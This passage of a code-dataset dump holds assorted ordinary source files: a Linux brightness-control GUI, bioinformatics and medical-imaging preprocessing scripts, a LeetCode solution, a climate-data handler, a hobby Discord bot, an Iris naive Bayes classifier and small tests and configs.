use\n\n\n\t#starts the countdown\n\tdef startCount(self):\n\t\tself.timer = QtCore.QTimer() # set up your QTimer\n\t\tself.timer.timeout.connect(self.updateButtonCount) # connect it to your update function\n\t\tself.timer.start(1000) #1000 milliseconds = 1 second(interval between the counts) \n\n\n\tdef updateButtonCount(self):\n\t\t#That messsage box will be displayed until count is 0(10 seconds)\n\t\tif self.count > 0:\n\t\t\tself.msg.setText(\"Reverting in (%s)\"%self.count)\n\t\t\tself.count-=1 \n\t\t\n\t\t#if the count is 0(completion of 10 seconds) then fix the brightness value\n\t\telse:\n\t\t\tself.timer.stop()\n\t\t\tself.msg.done(1)\n\t\t\tself.slide.setValue(int(self.prev))\n\t\t\ttry:\n\t\t\t\ttext = str(self.prev)\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\tsave(\"/sys/class/backlight/nv_backlight\",text)\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\ttext = str(self.prev*26)\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\tsave(\"/sys/class/backlight/radeon_bl0_backlight\",text)\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttext = str(self.prev*75)\n\t\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\t\tsave(\"/sys/class/backlight/intel_backlight\",text)\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\ttext = int(self.prev)\n\t\t\t\t\t\t\twritex(text)\n\t\t\t\t\t\texcept IOError:\n\t\t\t\t\t\t\tsys.exit(1)\n\t\t\tself.count =9 #again setting up count for future use\n\t\t\n\t\t\n\t#this will actually set the brightness\n\tdef confirm(self):\n\t\tval = self.slide.value()\n\t\ttext = str(val)\n\t\ttry:\n\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\tinputFile.write(text)\n\t\t\t\tsave(\"/sys/class/backlight/nv_backlight\",text)\n\t\texcept IOError:\n\t\t\ttry:\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\tsave(\"/sys/class/backlight/radeon_bl0\",text)\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\tsave(\"/sys/class/backlight/intel_backlight\",text)\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\twritex(int(text))\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tsys.exit(1)\n\n\n#By using xrandr(if searched documents are not present we use xrandr),we set the brightness here \ndef writex(text):\n\top = subprocess.check_output(['xrandr','-q'])\n\n\tencoding = sys.getdefaultencoding()\n\tdecode = op.decode(encoding)\n\tdecode = decode.split('\\n')\n\tdecode = \" \".join(decode)\n\n\tdl = decode.split(' ')\n\n\tcon_list = []\n\n\tlength = len(dl)\n\tconn_list = []\n\tfor i in range(length):\n\t\tif dl[i] == 'connected':\n\t\t\tconn_list.append(i-1)\n\t\n\t#ending \\n\n\tconn_dev = []\n\t\n\tfor each in conn_list:\n\t\tconn_dev.append(dl[each])\n\n\tcmd_list = []\n\n\n\n\tfor dev in conn_dev:\n\t\tcmd_list.append('xrandr --output '+dev+' --brightness ')\n\n\tbt = (text/100.0)\n\tbt_str = 
str(bt)\n\tnew_cmd = []\n\tfor each in cmd_list:\n\t\tnew_cmd.append(each+bt_str)\n\tfor each in new_cmd:\n\t\tos.system(each)\n\tsavex(new_cmd[0])\n\n\n#getting the current brightness using xrandr\t\ndef readx():\n\top = subprocess.check_output(\"xrandr --verbose | grep -i brightness | cut -f2 -d ' '\",shell = True)\n\tencoding = sys.getdefaultencoding()\n\tdecode = op.decode(encoding)\n\tdecode = decode.split('\\n')\n\tdecode = \" \".join(decode)\n\tbl = decode.split(' ')\n\treturn(str(bl[0]))\n\n\n#remembering the brightness to adjust brightness when rebooted(may not work in some systems due to system or other startup applications)\n#needs to be updated!\t\t\ndef savex(cmd):\n\tusers = os.listdir(\"/home\")\n\tcmd = \"sleep 4 &&\"+cmd\n\tfor user in users:\n\t\tfilepath = \"/home/\"+user+\"/.config/autostart\"\n\t\tfileloc = filepath+\"/xbrightness.desktop\"\n\t\tif not os.path.exists(filepath):\n\t\t\tos.makedirs(filepath)\n\t\twith open(fileloc,'w') as save:\n\t\t\tsave.write(\"\"\"[Desktop Entry]\nName=Brightness for xrandr\nExec=\"\"\"+cmd+\"\"\"\nType=Application\n\t\t\"\"\")\n\n\n#(while not using xrandr)adding the job to crontab of executing a python script on every reboot \ndef save(floc,percent):\n\top = subprocess.getoutput(\"sudo crontab -l\")\n\tif \"@reboot python /bin/init_bt3.py &\" not in op:\n\t\tos.system(\"(sudo crontab -l 2>/dev/null; echo \\\"@reboot python /bin/init_bt3.py &\\\")| crontab -\")\n\tcmd = \"echo \"+str(percent)+\" > \"+floc+\"/brightness\"\n\twith open(\"/bin/init_bt3.py\",'w') as save:\n#\t\tsave.write(\"echo \"+percent+\" > \"+floc)\n\t\tsave.write(\"\"\"#!/usr/bin/python3\nimport os;\nclass save_bt:\n\tdef __init__(self):\n\t\tos.system(cmd)\n\t\t\ncmd = \\\"\"\"\"+cmd+\"\"\"\\\"\nsave_bt()\"\"\")\n\tos.system(\"chmod +x /bin/init_bt3.py\")\n\t\n\n#Finally this invokes the applications\ndef run():\n app=QtGui.QApplication(sys.argv)\n QtGui.QApplication.setStyle('cleanlooks') #you can change it to any style you wish(according to my personal opinion is,this looks better)\n GUI= Window()\n sys.exit(app.exec_())\n\nrun()\n","sub_path":"Brightness-python3/src/bt3.py","file_name":"bt3.py","file_ext":"py","file_size_in_byte":12546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"248787544","text":"#!/usr/bin/env python3\n\nfrom Bio.AlignIO import read\nfrom tqdm import tqdm\nimport sys\nimport numpy as np\n\nfrom tqdm import TqdmSynchronisationWarning\nimport warnings\n\nwarnings.simplefilter(\"ignore\", TqdmSynchronisationWarning)\n\n\ndef contains_only(col, values):\n return set(col) - set(values) == set()\n\n\ndef main():\n alignment = read(sys.stdin, \"fasta\")\n remove_chars = np.asarray(list(sys.argv[1]))\n length = alignment.get_alignment_length()\n print(\"Num sequences: %d\" % len(alignment), file=sys.stderr)\n print(\"Alignment length: %d\" % length, file=sys.stderr)\n\n keep_cols = []\n for i in tqdm(range(length)):\n if not contains_only(alignment[:, i], remove_chars):\n keep_cols.append(i)\n\n out = np.empty((len(alignment), len(keep_cols)), dtype=\"\" + seq.id)\n print(\"\".join(out[i, :]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/squeeze_alignment.py","file_name":"squeeze_alignment.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"321866735","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: 
103_zigzag_level_order.py\n Description :\n Author : cugxy\n date: 2019/5/31\n-------------------------------------------------\n Change Activity:\n 2019/5/31\n-------------------------------------------------\n\"\"\"\n\"\"\"\nGiven a binary tree, return the zigzag level order traversal of its nodes' values. (That is, traverse from left to right, then from right to left for the next level, and so on, alternating between levels.)\n\nFor example:\nGiven the binary tree [3,9,20,null,null,15,7],\n\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its zigzag level order traversal as:\n\n [\n [3],\n [20,9],\n [15,7]\n ]\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def zigzagLevelOrder(self, root):\n rs = []\n if root is None:\n return rs\n q = []\n q.append(root)\n d = 0\n while len(q) != 0:\n p = []\n for i in range(len(q)):\n node = q.pop(0)\n p.append(node.val)\n if node.left is not None:\n q.append(node.left)\n if node.right is not None:\n q.append(node.right)\n if d % 2 != 0:\n p = p[::-1]\n rs.append(p)\n d += 1\n return rs\n\n\nif __name__ == '__main__':\n n3 = TreeNode(3)\n n9 = TreeNode(9)\n n20 = TreeNode(20)\n n15 = TreeNode(15)\n n7 = TreeNode(7)\n n3.left = n9\n n3.right = n20\n n20.left = n15\n n20.right = n7\n s = Solution()\n r = s.zigzagLevelOrder(n3)\n print(r)\n pass\n","sub_path":"scripts/leetcode/103_zigzag_level_order.py","file_name":"103_zigzag_level_order.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"487634664","text":"\"\"\"\ne3sm_to_cmip cmor handler script\n\nHandler for Total Direct Emission Rate of SO4 (emiso4)\n\nInput Variable(s)\n------------------\n* SFso4_a1 : Surface flux of so4_a1, in kg m-2 s-1\n* SFso4_a2 : Surface flux of so4_a2, in kg m-2 s-1\n* SFso4_a3 : Surface flux of so4_a3, in kg m-2 s-1\n* so4_a1_CLXF : Vertically intergrated external forcing for so4_a1, in molec cm-2 s-1\n* so4_a2_CLXF : Vertically intergrated external forcing for so4_a2, in molec cm-2 s-1\n* so4_a3_CLXF : Vertically intergrated external forcing for so4_a3, in molec cm-2 s-1\n\nMatt Nicholson\n3 Mar 2020\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport cmor\nfrom e3sm_to_cmip.lib import handle_variables\n\n# list of raw variable names needed\nRAW_VARIABLES = ['SFso4_a1', 'SFso4_a2', 'SFso4_a3',\n 'so4_a1_CLXF', 'so4_a2_CLXF', 'so4_a3_CLXF']\nVAR_NAME = 'emiso4'\nVAR_UNITS = 'kg m-2 s-1'\nTABLE = 'CMIP6_AERmon.json'\nLEVELS = {\n 'name' : 'lev',\n 'units': 'hPa',\n 'e3sm_axis_name': 'lev'\n}\n\n\ndef write_data(varid, data, timeval, timebnds, index, **kwargs):\n \"\"\"\n emiso4 = SFso4_a1 + SFso4_a2 + SFso4_a3 + so4_a1_CLXF + so4_a2_CLXF + so4_a3_CLXF\n \"\"\"\n outdata = data['SFso4_a1'][index, :] + data['SFso4_a2'][index, :] + \\\n data['SFso4_a3'][index, :] + data['so4_a1_CLXF'][index, :] + \\\n data['so4_a2_CLXF'][index, :] + data['so4_a3_CLXF'][index, :]\n \n cmor.write(\n varid,\n outdata,\n time_vals=timeval,\n time_bnds=timebnds)\n# ------------------------------------------------------------------\n\n\ndef handle(infiles, tables, user_input_path, **kwargs):\n \"\"\"\n Parameters\n ----------\n infiles : list of str\n A list of strings of file names for the raw input data\n tables : str\n Path to CMOR tables\n user_input_path : str\n Path to user input json file\n \n Returns\n -------\n var name : str\n Name of the processed variable after processing is complete\n \"\"\"\n return handle_variables(\n metadata_path=user_input_path,\n tables=tables,\n table=TABLE,\n infiles=infiles,\n 
raw_variables=RAW_VARIABLES,\n write_data=write_data,\n outvar_name=VAR_NAME,\n outvar_units=VAR_UNITS,\n serial=kwargs.get('serial'),\n levels=LEVELS,\n logdir=kwargs.get('logdir'))\n# ------------------------------------------------------------------","sub_path":"cmorize/e3sm_to_cmip/cmor_handlers/emiso4.py","file_name":"emiso4.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"295910742","text":"#!/usr/bin/env python\n\nimport argparse as ap\nfrom lochness import config\nfrom lochness import keyring\nfrom pathlib import Path\nimport os\nimport json\n\n\ndef check_config(config_loc: str):\n with open(config_loc, 'rb') as fp:\n config_loaded = config._read_config_file(fp)\n keyring.pretty_print_dict(config_loaded)\n\n\ndef check_keyring(keyring_dict):\n keyring.print_keyring(keyring_dict)\n\n\ndef check_lochness_configurations():\n '''Check lochness configurations\n\n To check formatting, field names in following items\n - config.yml\n - lochness.enc\n - lochness.json (before encryption)\n '''\n\n parser = ap.ArgumentParser(description='Lochness configuration checker')\n parser.add_argument('-c', '--config', help='Configuration file')\n parser.add_argument('-ke', '--keyring_encrypted',\n help='Encrypted keyring file')\n parser.add_argument('-k', '--keyring',\n help='None keyring file in json format')\n\n args = parser.parse_args()\n\n\n if args.config:\n check_config(args.config)\n\n if args.keyring_encrypted:\n keyring_dict = keyring.load_encrypted_keyring(args.keyring_encrypted)\n check_keyring(keyring_dict)\n\n if args.keyring:\n keyring_path = Path(args.keyring)\n with open(keyring_path, 'r') as f:\n keyring_dict = json.load(f)\n check_keyring(keyring_dict)\n\n\nif __name__ == '__main__':\n check_lochness_configurations()\n","sub_path":"scripts/lochness_check_config.py","file_name":"lochness_check_config.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"505042932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nProject Euler Problem 147\n=======================\n\nIn a 3x2 cross-hatched grid, a total of 37 different rectangles could be\nsituated within that grid as indicated in the sketch.\n\nThere are 5 grids smaller than 3x2, vertical and horizontal dimensions\nbeing important, i.e. 1x1, 2x1, 3x1, 1x2 and 2x2. 
If each of them is\ncross-hatched, the following number of different rectangles could be\nsituated within those smaller grids:\n\n1x1: 1\n2x1: 4\n3x1: 8\n1x2: 4\n2x2: 18\n\nAdding those to the 37 of the 3x2 grid, a total of 72 different rectangles\ncould be situated within 3x2 and smaller grids.\n\nHow many different rectangles could be situated within 47x43 and smaller\ngrids?\n\n\"\"\"\n\n\ndef main():\n return \"unimplemented\"\n\n\nif __name__ == \"__main__\":\n import ntpath\n import time\n from common.shared_functions import verify_solution\n\n problem_number = int(ntpath.basename(__file__).replace(\"euler\", \"\").replace(\".py\", \"\"))\n print(\"Retrieving my answer to Euler Problem {0} ...\".format(problem_number))\n\n ts = time.time()\n my_answer = main()\n te = time.time()\n\n print(\"My answer: {1}\".format(problem_number, my_answer))\n\n verification_type = verify_solution(problem_number, my_answer)\n print(\"Verification: {0}\".format(verification_type.name))\n print(\"Took {0} seconds.\".format(te - ts))\n","sub_path":"project-euler/solvers/euler147.py","file_name":"euler147.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"75916894","text":"import os\nfrom discord.ext import commands\nimport discord\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\n\n\n\nintents = discord.Intents.default()\nintents.typing = True\nintents.presences = True\nintents.members = True\n\n\n\nbot = commands.Bot(\n command_prefix=\"!\", # Change to desired prefix\n case_insensitive=True, # Commands aren't case-sensitive\n intents=intents\n)\n\n\nbot.author_id = 269923118611562506 # Change to your discord id!!!\n\n@bot.event\nasync def on_ready(): # When the bot is ready\n print(\"I'm in\")\n print(bot.user) # Prints the bot's username and identifier\n\n@bot.command()\nasync def pong(ctx):\n print(ctx.message.author.id)\n await ctx.send('pong')\n\n\n@bot.command()\nasync def name(ctx):\n user_id = ctx.message.author.id\n user = await bot.fetch_user(user_id)\n await ctx.send(user.name)\n\n@bot.command()\nasync def count(ctx):\n members = ctx.message.guild.members\n status = {}\n for member in members:\n current_status = member.raw_status\n # Get the status only if the user is not a bot\n if not member.bot:\n if current_status in status:\n status[current_status] += 1\n else:\n status[current_status] = 1\n res = []\n for k, v in status.items():\n if (v == 1):\n tmp = f'{v} member is {k}'\n else:\n tmp = f'{v} members are {k}'\n res.append(tmp)\n real_res = ''\n for i in range(len(res) - 2):\n real_res += res[i] + ', '\n real_res += res[-2]\n real_res += ' and '\n real_res += res[-1]\n await ctx.send(real_res)\n\n@bot.command()\nasync def admin(ctx):\n message = ctx.message.content.split()[1]\n guild_roles = ctx.message.guild.roles\n guild = ctx.message.guild\n members = ctx.message.guild.members\n author_id = ctx.message.author.id\n supposed_admin = guild_roles[-1]\n user_id = ''\n if not supposed_admin.permissions.administrator:\n role = await guild.create_role('Admin', permissions=discord.Permissions(administrator=True))\n else:\n role = supposed_admin\n for member in members:\n if member.bot:\n admin_member = member\n if member.name == message:\n user_id = member.id\n if user_id == '':\n await ctx.send('The user selected does not exist')\n return\n await admin_member.add_roles(role)\n \n \n print(message)\n await ctx.send('Ok')\n\ndef fetch_content(url='https://xkcd.com/'):\n response = 
requests.get(url)\n img = Image.open(BytesIO(response.content))\n return img\n\n# Returns a vertical image of market indexes\ndef create_image():\n img = fetch_content()\n return Image.new('RGB', img)\n\n\n@bot.command()\nasync def xkcd(ctx):\n channel = ctx.message.channel\n img = fetch_content()\n with BytesIO() as image_binary:\n create_image().save(image_binary, 'PNG')\n image_binary.seek(0)\n await ctx.send(file=discord.File(fp=image_binary, filename='image.png'))\n\n@bot.command()\nasync def poll(ctx, **content):\n message = ctx.message.content.split()\n res = \"@here \"\n res += message[1]\n allowed_mentions = discord.AllowedMentions(everyone=True)\n await ctx.send(content=res, allowed_mentions=allowed_mentions)\n \n if len(content) == 3:\n await ctx.send(\"Impossible to add poll: too few choices provided.\")\n elif len(content) == 2:\n emojis = (':thumbsup',':thumbsdown')\n # react with thumbs up and down\n else:\n emojis = content[2:]\n \n for emoji in emojis:\n await message.add_reaction(emoji)\n \n\n\ntoken = os.getenv('BOT_TOKEN')\nbot.run(token) # Starts the bot","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"556171731","text":"import os\nfrom os import listdir\nfrom os.path import isfile, join\nfrom shutil import copyfile\nfrom tqdm import tqdm\nimport json\nimport sys\n\ntrain_dir = sys.argv[1]\ntest_dir = sys.argv[2]\n\nos.makedirs('./nnUNet/nnUNet_preprocessed', exist_ok=True)\nos.makedirs('./nnUNet/nnUNet_raw', exist_ok=True)\nos.makedirs('./nnUNet/nnUNet_trained_models', exist_ok=True)\n\ntrain_data = []\n\ntrain_image_dir = join(train_dir, 'image')\ntrain_label_dir = join(train_dir, 'label')\n\nfor file in sorted(listdir(train_image_dir)):\n image_path = join(train_image_dir, file)\n label_path = join(train_label_dir, file)\n \n image_name = image_path.split('/')[-1]\n label_name = label_path.split('/')[-1]\n \n assert image_name == label_name\n \n if isfile(image_path) and isfile(label_path):\n train_data.append({'image': image_path, 'label': label_path})\n\nbad_indexes = [189, 262, 659, 662, 703, 744, 1005, 1245, 1347, 1546, 1562, ]\n\ntraining_files = []\n\nnnu_image_dir = './nnUNet/nnUNet_raw/nnUNet_raw_data/Task101_BrainTS/imagesTr/'\nnnu_label_dir = './nnUNet/nnUNet_raw/nnUNet_raw_data/Task101_BrainTS/labelsTr/'\n\nos.makedirs(nnu_image_dir, exist_ok=True)\nos.makedirs(nnu_label_dir, exist_ok=True)\n\nfor index, sample in enumerate(tqdm(train_data), start=1):\n \n if index in bad_indexes:\n continue\n \n old_filename = sample['image'].split('/')[-1]\n \n image_filename = f'BrainTS_{index:04d}_0000.nii.gz'\n label_filename = f'BrainTS_{index:04d}.nii.gz'\n \n copyfile(sample['image'], join(nnu_image_dir, image_filename))\n copyfile(sample['label'], join(nnu_label_dir, label_filename))\n \n training_files.append({'image': join(nnu_image_dir, label_filename),\n 'label': join(nnu_label_dir, label_filename)})\n\ntest_data = []\n\nfor file in sorted(listdir(test_dir)):\n test_path = join(test_dir, file)\n \n test_name = test_path.split('/')[-1]\n \n if isfile(test_path):\n test_data.append(test_path)\n\ntest_files = []\nuun_test_dir = './test_images'\nos.makedirs(uun_test_dir, exist_ok=True)\n\nfor index, test_path in enumerate(tqdm(test_data)):\n old_filename = test_path.split('/')[-1]\n new_filename = old_filename.split('.')[0]+'_0000.nii.gz'\n \n copyfile(test_path, join(uun_test_dir, new_filename))\n\ndataset_config = 
dict(\n name='BrainTS',\n description='abc',\n tensorImageSize='4D',\n modality={'0':'MRI'},\n labels={'0':'background', '1':'tumor'},\n numTraining=len(training_files),\n numTest=0,\n training=training_files,\n test=[],\n)\n\nwith open('./nnUNet/nnUNet_raw/nnUNet_raw_data/Task101_BrainTS/dataset.json', 'w') as file:\n json.dump(dataset_config, file)\n","sub_path":"file_processor.py","file_name":"file_processor.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"381848990","text":"from __future__ import division\nimport numpy as np\nimport sys\nimport math\nimport pandas as pd\n\ndef meancov(f1):\n virginica=[]\n versicolor=[]\n setosa=[]\n\n for each in f1:\n classvar=each.split(',')\n if(classvar[4]==\"Iris-virginica\"):\n virginica.append(classvar[0:4])\n elif(classvar[4]==\"Iris-setosa\"):\n setosa.append(classvar[0:4])\n else:\n versicolor.append((classvar[0:4]))\n\n virginica=np.array(virginica,dtype='float')\n versicolor=np.array(versicolor,dtype='float')\n setosa=np.array(setosa,dtype='float')\n virginica=np.matrix(virginica)\n versicolor=np.matrix(versicolor)\n setosa=np.matrix(setosa)\n mean_virginica=virginica.mean(0)\n mean_setosa=setosa.mean(0)\n mean_versicolor=versicolor.mean(0)\n covar_virginica=np.cov(virginica,rowvar=False,bias=True)\n covar_setosa=np.cov(setosa,rowvar=False,bias=True)\n covar_versicolor=np.cov(versicolor,rowvar=False,bias=True)\n return(np.around(covar_virginica,2),np.around(covar_setosa,2),np.around(covar_versicolor,2),np.around(mean_virginica,2),\n np.around(mean_setosa,2),np.around(mean_versicolor,2))\n\ndef priorsfinding(traindata):\n d={}\n priors = {}\n try:\n names = []\n for each in traindata:\n classvar = each.split(',')\n names.append(classvar[4])\n for i in names:\n d[i] = d.get(i, 0) + 1\n except IndexError:\n names = []\n for each in traindata:\n classvar = each.split(',')\n names.append(classvar[4])\n for i in names:\n d[i] = d.get(i, 0) + 1\n for (values, keys) in zip(d.values(), d.keys()):\n priors[keys] = np.around((values / len(names)), 2)\n #print(priors)\n # sys.stdout = open(\"assign3-iusaichoud.txt\", \"w\")\n covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa, mean_versicolor = meancov(traindata)\n return (priors, covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa, mean_versicolor)\n\ndef findPriors(f1):\n\n kfolds = 3\n instances = (len(f1) - 1) / kfolds\n # print(instances)\n f1 = f1[:-1]\n train_1fold = f1[0:int(instances)]\n train_2fold = f1[int(instances):int(instances * 2)]\n train_3fold = f1[int(instances * 2):]\n # print(len(train_1fold),len(train_2fold),len(test_3fold))\n traindata = train_1fold + train_2fold\n testdata=train_3fold\n traindata1=train_2fold+train_3fold\n testdata1=train_1fold\n traindata2=train_1fold+train_3fold\n testdata2=train_2fold\n train=[traindata,traindata1,traindata2]\n test=[testdata,testdata1,testdata2]\n answ=[]\n for each,i in zip(train,test):\n priors, covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa, mean_versicolor=priorsfinding(each)\n answ.append((priors, covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa,\n mean_versicolor,i))\n return answ\n\ndef estimateLikelyhood(covariance,mean,point,prior):\n a = math.pow(math.sqrt(2 * np.pi), 4)\n b = math.sqrt(np.linalg.det(covariance))\n ktt = np.matrix(point - mean)\n c = ((ktt).dot(np.linalg.inv(covariance)).dot(ktt.transpose())) / 2\n # 
c=np.matmul(covariance,(np.linalg.inv(covariance)))\n # print((a*b),c,ktt,point,mean)\n d = (1 / (a * b)) * math.exp(-(c))\n return(d*prior)\n\ndef likelyhood(priors,virginica,setosa,versicolor,means,names):\n #print(means[1][0])\n prob=[]\n for i in range(len(names)):\n p=[]\n arr=np.array(names[i], dtype=float)\n post_virginica=estimateLikelyhood(virginica, means[0][0], arr, priors['Iris-virginica'])\n post_setosa=estimateLikelyhood(setosa,means[1][0],arr,priors['Iris-setosa'])\n post_versicolor=estimateLikelyhood(versicolor,means[2][0],arr,priors['Iris-versicolor'])\n p.append([post_virginica,post_setosa,post_versicolor])\n prob.append(p)\n #print(len(prob))\n classlabel=[]\n for each in prob:\n classlabel.append(each[0].index(max(each[0])))\n return classlabel\n\ndef metrics(mat,df):\n\n Accuracy=[]\n precision=[]\n recall=[]\n F1score=[]\n TP = (np.diag(mat))\n #print(TruePoistive)\n for (i,j) in zip(range(3),range(3)):\n TruePoistive=TP[i]\n df1=(df.drop(i,axis=1).drop(j,axis=0))\n #print(df1,sum(sum(df1.values)))\n TrueNegative=sum(sum(df1.values))\n #print(df)\n a=df[i].values\n b=df.loc[i].values\n #print(a,b)\n falseNegative=sum(np.delete(a,i))\n falsePositive=sum(np.delete(b,i))\n #print(TruePoistive,TrueNegative,falseNegative,falsePositive)\n #print(falsePositive,falseNegative)\n p=(TruePoistive)/(TruePoistive+falsePositive)\n r=(TruePoistive)/(TruePoistive+falseNegative)\n Accuracy.append((TruePoistive+TrueNegative)/(TruePoistive+TrueNegative+falseNegative+falsePositive))\n precision.append(p)\n recall.append(r)\n F1score.append((2*((p*r)/(p+r))))\n #print(Accuracy)\n return(Accuracy,precision,recall,F1score)\n\ndef main():\n acc=[]\n prec=[]\n rec=[]\n f1score=[]\n conf=[]\n f = open(sys.argv[1], \"r\")\n file = f.read()\n f1=file.split(\"\\n\")\n answ=findPriors(f1)\n #print(answ[0][7])\n for each in answ:\n names = []\n labels = []\n for eac in each[7]:\n classvar = eac.split(',')\n names.append(classvar[0:4])\n labels.append(classvar[4])\n classlabel = likelyhood(each[0], each[1], each[2], each[3], each[4:7], names)\n #print(classlabel)\n lab = []\n lab1=[]\n for each in classlabel:\n if (each == 2):\n lab.append('Iris-versicolor')\n elif (each == 0):\n lab.append('Iris-virginica')\n elif (each == 1):\n lab.append('Iris-setosa')\n for each in labels:\n if (each == 'Iris-versicolor'):\n lab1.append(2)\n elif (each == 'Iris-virginica'):\n lab1.append(0)\n elif (each == 'Iris-setosa'):\n lab1.append(1)\n actual = pd.Series(labels, name='Actual')\n predicted = pd.Series(lab, name='Predicted')\n actual1 = pd.Series(lab1, name='Actual')\n predicted1 = pd.Series(classlabel, name='Predicted')\n sys.stdout=open(\"testfile_pavan.txt\",\"w\")\n df_confusion = pd.crosstab(predicted, actual)\n df_confusion1 = pd.crosstab(predicted1, actual1)\n conf.append(df_confusion)\n mat=np.matrix(df_confusion1.values)\n #print(conf)\n accuracy,precision,recall,F1score=metrics(mat,df_confusion1)\n #print(accuracy)\n acc.append(accuracy)\n prec.append(precision)\n rec.append(recall)\n f1score.append(F1score)\n #print(np.matrix(acc),\"\\n\",np.matrix(prec),\"\\n\",np.matrix(rec),\"\\n\",np.matrix(f1score))\n print(\"The confusion matrices are\\n\", conf,\"\\n Metrics averaged over 3 folds\\n\",\"Accuracy :\",np.matrix(acc).mean(0),\n \"\\n\",\"Precision :\", np.matrix(prec).mean(0),\"\\n\",\"Recall:\",np.matrix(rec).mean(0),\"\\n\",\n \"F1Score:\",np.matrix(f1score).mean(0))\n\n\n\nif __name__ == \"__main__\":\n 
main()","sub_path":"Ass33.py","file_name":"Ass33.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"502581544","text":"import os\nimport json\nfrom uuid import uuid4\nfrom tests.resources import AppTestBase\n\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nIMAGE_RESOURCES_PATH = os.path.join(THIS_DIR, os.pardir, 'resources/policies')\n\n\nclass TestUploadProfileImage(AppTestBase):\n\n def setUp(self) -> None:\n super(TestUploadProfileImage, self).setUp()\n\n def test_creation(self):\n\n data = {\n \"policy\": (open(\n IMAGE_RESOURCES_PATH + os.path.sep + \"sample_policy.json\", 'rb'\n ),\n 'sample_policy.json')\n }\n\n response = self.client.post(\n '/policies/data-provider/{}/data-set/{}/data-consumer/{}'.format(uuid4(), uuid4(), uuid4()),\n data=data,\n content_type='multipart/form-data',\n )\n\n self.assertEqual(200, response.status_code)\n\n data = json.loads(response.data.decode())\n response = self.client.get(\n '/policies/{}'.format(data.get('id')),\n content_type='multipart/form-data',\n )\n\n self.assertEqual(200, response.status_code)\n\n","sub_path":"services_infrastructure/policy-catalogue/tests/views/test_policy_retrieve.py","file_name":"test_policy_retrieve.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"506590341","text":"import json\nimport pprint\n\nwith open('employees.json' , 'r' ) as file:\n data = json.load( file )\n\nprinter = pprint.PrettyPrinter()\n# printer.pprint(data)\n\nlanguage = data.get('programming_language')\nemployees = data.get('employees')\n\nprint(language)\n\nfor employee in employees:\n print(employee.get('id') , employee.get('fullname'))","sub_path":"chaldal/working_with_json/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"394612237","text":"target = \"xilinx\"\naction = \"synthesis\"\nsyn_device = \"xc7z020\"\nsyn_grade = \"-1\"\nsyn_package = \"clg484\"\nsyn_top = \"zed_top\"\nsyn_project = \"zedboard\"\nsyn_tool = \"planahead\"\n\nfiles = [\n 